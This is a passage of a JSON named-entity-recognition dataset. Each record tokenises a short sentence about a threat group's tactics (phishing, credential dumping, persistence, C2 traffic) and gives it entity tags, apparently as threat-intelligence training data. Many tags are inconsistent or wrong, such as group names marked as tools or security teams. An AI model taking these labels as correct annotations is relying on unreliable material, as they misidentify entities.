"persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "used", "the", "Windows", "service", "<code>winmgmts:\\\\.\\root\\SecurityCenter2</code>", "to", "check", "installed", "antivirus", "products." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "used", "tools", "to", "enumerate", "software", "installed", "on", "an", "infected", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "sent", "e-mails", "with", "malicious", "attachments", "often", "crafted", "for", "specific", "targets." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "sent", "e-mails", "with", "malicious", "attachments", "that", "lead", "victims", "to", "credential", "harvesting", "websites." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "sent", "e-mails", "with", "malicious", "links", "often", "crafted", "for", "specific", "targets." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "sent", "e-mails", "with", "malicious", "links", "to", "credential", "harvesting", "websites." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "used", "tools", "to", "collect", "the", "computer", "name,", "OS", "version,", "installed", "hotfixes,", "as", "well", "as", "information", "regarding", "the", "memory", "and", "processor", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "used", "malware", "to", "collect", "information", "on", "network", "interfaces,", "including", "the", "MAC", "address." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "used", "tools", "to", "identify", "the", "user", "of", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "used", "tools", "to", "obtain", "the", "current", "system", "time." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Sidewinder", "has", "used", "VBScript", "to", "drop", "and", "execute", "malware", "loaders." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sidewinder", "has", "used", "HTTP", "in", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Silence", "has", "used", "a", "valid", "certificate", "to", "sign", "their", "primary", "loader", "Silence.Downloader", "(aka", "TrueBot)." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Silence", "has", "used", "environment", "variable", "string", "substitution", "for", "obfuscation." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Silence", "has", "weaponized", "CHM", "files", "in", "their", "phishing", "campaigns." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Silence", "has", "used", "ProxyBot,", "which", "allows", "the", "attacker", "to", "redirect", "traffic", "from", "the", "current", "node", "to", "the", "backconnect", "server", "via", "Sock4\\Socks5." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Silence", "has", "deleted", "artifacts,", "including", "scheduled", "tasks,", "communicates", "files", "from", "the", "C2", "and", "other", "logs." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Silence", "has", "downloaded", "additional", "modules", "and", "malware", "to", "victim’s", "machines." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Silence", "has", "used", "JS", "scripts." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Silence", "has", "used", "the", "Farse6.1", "utility", "(based", "on", "Mimikatz)", "to", "extract", "credentials", "from", "lsass.exe." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O", "I-Purp", "I-Purp", "O", "B-Way" ] }, { "tokens": [ "Silence", "attempts", "to", "get", "users", "to", "launch", "malicious", "attachments", "delivered", "via", "spearphishing", "emails." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Silence", "has", "named", "its", "backdoor", "\"WINWORD.exe\"." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Silence", "can", "create,", "delete,", "or", "modify", "a", "specified", "Registry", "key", "or", "value." ], "ner_tags": [ "B-HackOrg", "O", "B-Features", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Silence", "has", "leveraged", "the", "Windows", "API,", "including", "using", "CreateProcess()", "or", "ShellExecute(),", "to", "perform", "a", "variety", "of", "tasks." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Silence", "has", "used", "port", "444", "when", "sending", "data", "about", "the", "system", "from", "the", "client", "to", "the", "server." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Silence", "has", "used", "PowerShell", "to", "download", "and", "execute", "payloads." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Silence", "has", "injected", "a", "DLL", "library", "containing", "a", "Trojan", "into", "the", "fwmain32.exe", "process." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Silence", "has", "used", "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>,", "<code>HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>,", "and", "the", "Startup", "folder", "to", "establish", "persistence." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "B-Way", "O", "O", "B-Way", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Silence", "has", "used", "RDP", "for", "lateral", "movement." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Silence", "has", "used", "Nmap", "to", "scan", "the", "corporate", "network,", "build", "a", "network", "topology,", "and", "identify", "vulnerable", "hosts." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Silence", "has", "used", "scheduled", "tasks", "to", "stage", "its", "operation." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Silence", "can", "capture", "victim", "screen", "activity." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Silence", "has", "used", "Winexe", "to", "install", "a", "service", "on", "the", "remote", "system." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Silence", "has", "used", "RAdmin,", "a", "remote", "software", "tool", "used", "to", "remotely", "control", "workstations", "and", "ATMs." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "Silence", "has", "sent", "emails", "with", "malicious", "DOCX,", "CHM,", "LNK", "and", "ZIP", "attachments." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "B-Way", "B-Way", "B-Way", "O", "B-Tool", "O" ] }, { "tokens": [ "Silence", "has", "obtained", "and", "modified", "versions", "of", "publicly-available", "tools", "like", "Empire", "and", "PsExec." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "B-Way" ] }, { "tokens": [ "Silence", "has", "used", "compromised", "credentials", "to", "log", "on", "to", "other", "systems", "and", "escalate", "privileges." ], "ner_tags": [ "B-HackOrg", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Silence", "has", "been", "observed", "making", "videos", "of", "victims", "to", "observe", "bank", "employees", "day", "to", "day", "activities." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Org", "I-Org", "O", "O", "O", "O" ] }, { "tokens": [ "Silence", "has", "used", "VBS", "scripts." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Silence", "has", "used", "Windows", "command-line", "to", "run", "commands." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Silent", "Librarian", "has", "obtained", "free", "Let's", "Encrypt", "SSL", "certificates", "for", "use", "on", "their", "phishing", "pages." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Silent", "Librarian", "has", "acquired", "domains", "to", "establish", "credential", "harvesting", "pages,", "often", "spoofing", "the", "target", "organization", "and", "using", "free", "top", "level", "domains", ".TK,", ".ML,", ".GA,", ".CF,", "and", ".GQ." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "Silent", "Librarian", "has", "established", "e-mail", "accounts", "to", "receive", "e-mails", "forwarded", "from", "compromised", "accounts." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Silent", "Librarian", "has", "collected", "e-mail", "addresses", "from", "targeted", "organizations", "from", "open", "Internet", "searches." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Silent", "Librarian", "has", "exfiltrated", "entire", "mailboxes", "from", "compromised", "accounts." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Silent", "Librarian", "has", "set", "up", "auto", "forwarding", "rules", "on", "compromised", "e-mail", "accounts." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Silent", "Librarian", "has", "collected", "lists", "of", "names", "for", "individuals", "from", "targeted", "organizations." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Silent", "Librarian", "has", "cloned", "victim", "organization", "login", "pages", "and", "staged", "them", "for", "later", "use", "in", "credential", "harvesting", "campaigns.", "Silent", "Librarian", "has", "also", "made", "use", "of", "a", "variety", "of", "URL", "shorteners", "for", "these", "staged", "websites." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "I-OffAct", "O", "I-HackOrg", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Silent", "Librarian", "has", "used", "collected", "lists", "of", "names", "and", "e-mail", "accounts", "to", "use", "in", "password", "spraying", "attacks", "against", "private", "sector", "targets." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "I-OffAct", "I-OffAct", "I-OffAct", "O", "O", "O", "O" ] }, { "tokens": [ "Silent", "Librarian", "has", "searched", "victim's", "websites", "to", "identify", "the", "interests", "and", "academic", "areas", "of", "targeted", "individuals", "and", "to", "scrape", "source", "code,", "branding,", "and", "organizational", "contact", "information", "for", "phishing", "pages." ], "ner_tags": [ "I-SecTeam", "I-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Silent", "Librarian", "has", "used", "links", "in", "e-mails", "to", "direct", "victims", "to", "credential", "harvesting", "websites", "designed", "to", "appear", "like", "the", "targeted", "organization's", "login", "page." ], "ner_tags": [ "I-HackOrg", "B-HackOrg", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Silent", "Librarian", "has", "obtained", "free", "and", "publicly", "available", "tools", "including", "SingleFile", "and", "HTTrack", "to", "copy", "login", "pages", "of", "targeted", "organizations." ], "ner_tags": [ "I-SecTeam", "I-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Silent", "Librarian", "has", "used", "compromised", "credentials", "to", "obtain", "unauthorized", "access", "to", "online", "accounts." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SilverTerrier", "uses", "FTP", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SilverTerrier", "targets", "organizations", "in", "high", "technology,", "higher", "education,", "and", "manufacturing", "for", "business", "email", "compromise", "(BEC)", "campaigns", "with", "the", "goal", "of", "financial", "theft." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Idus", "O", "I-Idus", "O", "O", "B-Idus", "O", "O", "O", "O", "B-Org", "B-OffAct", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "SilverTerrier", "uses", "SMTP", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "SilverTerrier", "uses", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Sowbug", "extracted", "documents", "and", "bundled", "them", "into", "a", "RAR", "archive." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sowbug", "extracted", "Word", "documents", "from", "a", "file", "server", "on", "a", "victim", "network." ], "ner_tags": [ "B-Idus", "O", "B-Tool", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sowbug", "identified", "and", "extracted", "all", "Word", "documents", "on", "a", "server", "by", "using", "a", "command", "containing", "*", ".doc", "and", "*.docx.", "The", "actors", "also", "searched", "for", "documents", "based", "on", "a", "specific", "date", "range", "and", "attempted", "to", "identify", "all", "installed", "software", "on", "a", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sowbug", "has", "used", "keylogging", "tools." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Sowbug", "named", "its", "tools", "to", "masquerade", "as", "Windows", "or", "Adobe", "Reader", "software,", "such", "as", "by", "using", "the", "file", "name", "adobecms.exe", "and", "the", "directory", "<code>CSIDL_APPDATA\\microsoft\\security</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Sowbug", "listed", "remote", "shared", "drives", "that", "were", "accessible", "from", "a", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sowbug", "has", "used", "credential", "dumping", "tools." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "Sowbug", "obtained", "OS", "version", "and", "hardware", "configuration", "from", "a", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sowbug", "has", "used", "command", "line", "during", "its", "intrusions." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stealth", "Falcon", "malware", "uses", "WMI", "to", "script", "data", "collection", "and", "command", "execution", "on", "the", "victim." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stealth", "Falcon", "malware", "gathers", "passwords", "from", "multiple", "sources,", "including", "Windows", "Credential", "Vault", "and", "Outlook." ], "ner_tags": [ "B-Way", "B-HackOrg", "B-Tool", "B-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stealth", "Falcon", "malware", "gathers", "passwords", "from", "multiple", "sources,", "including", "Internet", "Explorer,", "Firefox,", "and", "Chrome." ], "ner_tags": [ "B-Way", "B-HackOrg", "O", "B-Features", "B-HackOrg", "O", "O", "O", "O", "I-Tool", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Stealth", "Falcon", "malware", "gathers", "data", "from", "the", "local", "victim", "system." ], "ner_tags": [ "B-Way", "B-HackOrg", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "data", "is", "collected", "by", "Stealth", "Falcon", "malware,", "it", "is", "exfiltrated", "over", "the", "existing", "C2", "channel." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stealth", "Falcon", "malware", "uses", "PowerShell", "commands", "to", "perform", "various", "functions,", "including", "gathering", "system", "information", "via", "WMI", "and", "executing", "commands", "from", "its", "C2", "server." ], "ner_tags": [ "B-Idus", "B-HackOrg", "B-Tool", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stealth", "Falcon", "malware", "gathers", "a", "list", "of", "running", "processes." ], "ner_tags": [ "B-Way", "I-Tool", "I-Tool", "B-Features", "I-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "Stealth", "Falcon", "malware", "attempts", "to", "determine", "the", "installed", "version", "of", ".NET", "by", "querying", "the", "Registry." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Stealth", "Falcon", "malware", "creates", "a", "scheduled", "task", "entitled", "“IE", "Web", "Cache”", "to", "execute", "a", "malicious", "file", "hourly." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stealth", "Falcon", "malware", "encrypts", "C2", "traffic", "using", "RC4", "with", "a", "hard-coded", "key." ], "ner_tags": [ "B-Idus", "B-HackOrg", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stealth", "Falcon", "malware", "gathers", "system", "information", "via", "WMI,", "including", "the", "system", "directory,", "build", "number,", "serial", "number,", "version,", "manufacturer,", "model,", "and", "total", "physical", "memory." ], "ner_tags": [ "B-SamFile", "B-HackOrg", "O", "B-Features", "I-Features", "I-Features", "O", "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stealth", "Falcon", "malware", "gathers", "the", "Address", "Resolution", "Protocol", "(ARP)", "table", "from", "the", "victim." ], "ner_tags": [ "B-Way", "I-Tool", "I-Tool", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stealth", "Falcon", "malware", "gathers", "the", "registered", "user", "and", "primary", "owner", "name", "via", "WMI." ], "ner_tags": [ "B-Way", "B-HackOrg", "B-Tool", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Stealth", "Falcon", "malware", "communicates", "with", "its", "C2", "server", "via", "HTTPS." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Stealth", "Falcon", "malware", "gathers", "passwords", "from", "the", "Windows", "Credential", "Vault." ], "ner_tags": [ "B-Way", "B-Tool", "B-Tool", "B-Features", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stealth", "Falcon", "malware", "gathers", "system", "information", "via", "Windows", "Management", "Instrumentation", "(WMI)." ], "ner_tags": [ "B-Way", "I-Tool", "I-Tool", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Strider", "has", "used", "a", "hidden", "file", "system", "that", "is", "stored", "as", "a", "file", "on", "disk." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Strider", "has", "used", "local", "servers", "with", "both", "local", "network", "and", "Internet", "access", "to", "act", "as", "internal", "proxy", "nodes", "to", "exfiltrate", "data", "from", "other", "parts", "of", "the", "network", "without", "direct", "Internet", "access." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Strider", "has", "registered", "its", "persistence", "module", "on", "domain", "controllers", "as", "a", "Windows", "LSA", "(Local", "System", "Authority)", "password", "filter", "to", "acquire", "credentials", "any", "time", "a", "domain,", "local", "user,", "or", "administrator", "logs", "in", "or", "changes", "a", "password." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Suckfly", "has", "used", "stolen", "certificates", "to", "sign", "its", "malware." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Suckfly", "the", "victim's", "internal", "network", "for", "hosts", "with", "ports", "8080,", "5900,", "and", "40", "open." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Suckfly", "used", "a", "signed", "credential-dumping", "tool", "to", "obtain", "victim", "account", "credentials." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Suckfly", "used", "legitimate", "account", "credentials", "that", "they", "dumped", "to", "navigate", "the", "internal", "victim", "network", "as", "though", "they", "were", "the", "legitimate", "account", "owner." ], "ner_tags": [ "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Several", "tools", "used", "by", "Suckfly", "have", "been", "command-line", "driven." ], "ner_tags": [ "O", "O", "O", "O", "B-OffAct", "O", "O", "O", "O" ] }, { "tokens": [ "TA2541", "has", "used", "TLS", "encrypted", "C2", "communications", "including", "for", "campaigns", "using", "AsyncRAT." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "TA2541", "has", "attempted", "to", "disable", "built-in", "security", "protections", "such", "as", "Windows", "AMSI." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA2541", "has", "registered", "domains", "often", "containing", "the", "keywords", "“kimjoy,”", "“h0pe,”", "and", "“grace,”", "using", "domain", "registrars", "including", "Netdorm", "and", "No-IP", "DDNS,", "and", "hosting", "providers", "including", "xTom", "GmbH", "and", "Danilenko,", "Artyom." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Idus", "B-Org", "O", "B-Org", "O", "O", "O", "O" ] }, { "tokens": [ "TA2541", "has", "used", "dynamic", "DNS", "services", "for", "C2", "infrastructure." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "TA2541", "has", "used", "compressed", "and", "char-encoded", "scripts", "in", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA2541", "has", "used", "malicious", "scripts", "and", "macros", "with", "the", "ability", "to", "download", "additional", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "B-Tool", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "TA2541", "has", "run", "scripts", "to", "check", "internet", "connectivity", "from", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA2541", "has", "used", "macro-enabled", "MS", "Word", "documents", "to", "lure", "victims", "into", "executing", "malicious", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-SamFile", "I-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA2541", "has", "used", "malicious", "links", "to", "cloud", "and", "web", "services", "to", "gain", "execution", "on", "victim", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA2541", "has", "used", "multiple", "strains", "of", "malware", "available", "for", "purchase", "on", "criminal", "forums", "or", "in", "open-source", "repositories." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA2541", "has", "used", "file", "names", "to", "mimic", "legitimate", "Windows", "files", "or", "system", "functionality." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA2541", "has", "used", "`mshta`", "to", "execute", "scripts", "including", "VBS." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA2541", "has", "used", "PowerShell", "to", "download", "files", "and", "to", "inject", "into", "various", "Windows", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA2541", "has", "used", "process", "hollowing", "to", "execute", "CyberGate", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "TA2541", "has", "injected", "malicious", "code", "into", "legitimate", ".NET", "related", "processes", "including", "regsvcs.exe,", "msbuild.exe,", "and", "installutil.exe." ], "ner_tags": [ "B-Idus", "O", "I-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "TA2541", "has", "placed", "VBS", "files", "in", "the", "Startup", "folder", "and", "used", "Registry", "run", "keys", "to", "establish", "persistence", "for", "malicious", "payloads." ], "ner_tags": [ "B-Idus", "O", "I-Way", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA2541", "has", "used", "scheduled", "tasks", "to", "establish", "persistence", "for", "installed", "tools." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA2541", "has", "used", "tools", "to", "search", "victim", "systems", "for", "security", "products", "such", "as", "antivirus", "and", "firewall", "software." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "TA2541", "has", "used", "a", ".NET", "packer", "to", "obfuscate", "malicious", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "TA2541", "has", "sent", "phishing", "emails", "with", "malicious", "attachments", "for", "initial", "access", "including", "MS", "Word", "documents." ], "ner_tags": [ 